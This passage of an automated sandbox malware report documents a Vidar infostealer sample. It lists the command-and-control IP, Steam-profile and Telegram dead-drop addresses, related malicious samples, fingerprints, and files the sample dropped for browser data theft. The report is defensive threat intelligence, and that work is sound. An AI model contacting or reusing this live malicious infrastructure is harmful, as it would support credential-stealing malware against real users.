                                                                                                              https://store.steampowered.com/news/RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                		high
                                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                  		high
                                                                                                                  https://78.46.229.36/dRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ECFHIJKJ.3.drfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                      		high
                                                                                                                      https://78.46.229.36/gRegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                        		high
                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                          		high
                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.drfalse
                                                                                                                            		high
                                                                                                                            https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                              		high
                                                                                                                              https://78.46.229.36/2RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://steamcommunity.com/profiles/76561199658817715/inventory/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/stats/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                  		high
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                    		high
                                                                                                                                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                      		high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                        		high
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                          		high
                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallEGIDAAFI.3.drfalse
                                                                                                                                            		high
                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchECFHIJKJ.3.drfalse
                                                                                                                                              		high
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                		high
                                                                                                                                                https://78.46.229.36/BRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                		unknown
                                                                                                                                                https://78.46.229.36/DRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okCristinafile.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.sqlite.org/copyright.html.RegAsm.exe, 00000003.00000002.1982390660.0000000019EED000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199658817715[1].htm.3.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://78.46.229.36JEBKERegAsm.exe, 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		low
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoECFHIJKJ.3.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119965881771576561199658817715[1].htm.3.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                                          		high

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          78.46.229.36
                                                                                                                                                                          		unknownGermany
                                                                                                                                                                          		24940HETZNER-ASDEtrue
                                                                                                                                                                          104.112.44.153
                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                          		16625AKAMAI-ASUSfalse

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                          Analysis ID:1417473
                                                                                                                                                                          Start date and time:2024-03-29 12:07:05 +01:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 6m 38s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:11
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:file.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/30@1/2
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          • Number of executed functions: 83
                                                                                                                                                                          • Number of non-executed functions: 206
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          12:07:55API Interceptor1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                          12:07:58API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          78.46.229.36file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                              6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                  i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                    yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                        Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                          Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                              104.112.44.153file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                1x43xx.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  wlUQUBDNsV.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                                    3Q6szo2XZ9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      qyNqgJ8r1I.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousRisePro StealerBrowse

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 104.71.182.190
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.102.129.112
                                                                                                                                                                                                          i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 23.47.27.74
                                                                                                                                                                                                          yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 23.47.27.74
                                                                                                                                                                                                          EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.102.129.112
                                                                                                                                                                                                          Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.102.129.112
                                                                                                                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                          • 104.105.90.131

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          AKAMAI-ASUShttps://depl.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 23.43.243.35
                                                                                                                                                                                                          https://attwebupdate.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.43.243.137
                                                                                                                                                                                                          https://mysteryclickm.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.67.9.123
                                                                                                                                                                                                          Facture_160087511.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 23.52.162.98
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          https://ckydb04.na1.hubspotlinks.com/Ctc/OP+113/cKydB04/VW9bQw4skpv3N4QMDhk6pMpJW5g6HvJ5ccjQdN61zzVd3qn9gW7lCdLW6lZ3m-VBhZqP2fNwFyN40GRrrMQlZ-N2TdQmJ13Y6QW10XVPX3kbMHcN4L237-7KHZ5W1zLF7f8GbdtBW2ZKqmb4N84ZcW3QDpzS6S7KJJW5X7x_l7b4v9TW2F362D3Hh1s9W54lklM4T0vLxN7h7S8FNlcHjW20Y8Mn2bFBzVW9hqyrD48FY07W1SGLwZ5DF_9-W40HntB7qL0THW1mF8BY3vVj3gW2n5NX74XPrGTW45qZ3V6l-BrTN7CsbcvdfdyCW5951f94y1-HGN8ZFSwmVlSf3W5fSXSN3-n9KQW8hNdv46-Q6rkf7QDZST04Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.105.46.200
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 104.71.182.190
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          p8F35SRiO8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.192.2.176
                                                                                                                                                                                                          Kie7OQsnAC.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.74.215.167
                                                                                                                                                                                                          HETZNER-ASDEInjectToolInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                          • 5.161.74.235
                                                                                                                                                                                                          MXpl6HFisn.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                                          • 95.216.41.236
                                                                                                                                                                                                          Mcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 144.76.170.20
                                                                                                                                                                                                          getscreen-728974364.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 5.75.168.191
                                                                                                                                                                                                          getscreen-728974364.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 5.75.168.191
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          JAJL2EYBPH.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 138.201.79.103

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          Rechnung.pdf.lnkGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          Esp.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19DHL INVOICE DOCUMENT NOTIFICATION 202403286777373688_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          inpau292101.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          SecuriteInfo.com.FileRepMalware.14270.3068.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          SecuriteInfo.com.FileRepMalware.14270.3068.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          dVX6r5CyYY.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          assento 555 pro-Model-2.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          awb_shipping_doc_23642.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          TOMBIG - 9004898 - Ponuka#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                                                          • 104.112.44.153
                                                                                                                                                                                                          ocrev ns.ordine 290520280324.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                          • 104.112.44.153

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          C:\ProgramData\freebl3.dllOJP7vrLRNG.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            GqMyzGzrFq.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                z5uPcOrP22.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                  BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                    6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                          yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            EcNghZJd5O.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              C:\ProgramData\mozglue.dllOJP7vrLRNG.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                GqMyzGzrFq.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    z5uPcOrP22.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                      BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                        6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                              yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                EcNghZJd5O.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                  C:\ProgramData\BKKJKFBKKECFHJKEBKEHIDAEBK

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\ProgramData\CAAKKFHC

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

